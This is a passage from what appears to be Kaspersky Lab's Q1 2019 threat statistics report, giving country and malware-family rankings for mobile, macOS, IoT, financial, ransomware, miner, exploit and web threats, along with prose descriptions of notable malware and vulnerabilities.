likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a \u0438 AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. \n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Verdict | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware downloaded of victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p\n\n## Financial threats\n\n### Quarterly highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 | \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 | \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>. To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24,16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17,17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46,16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44,14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43,17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard 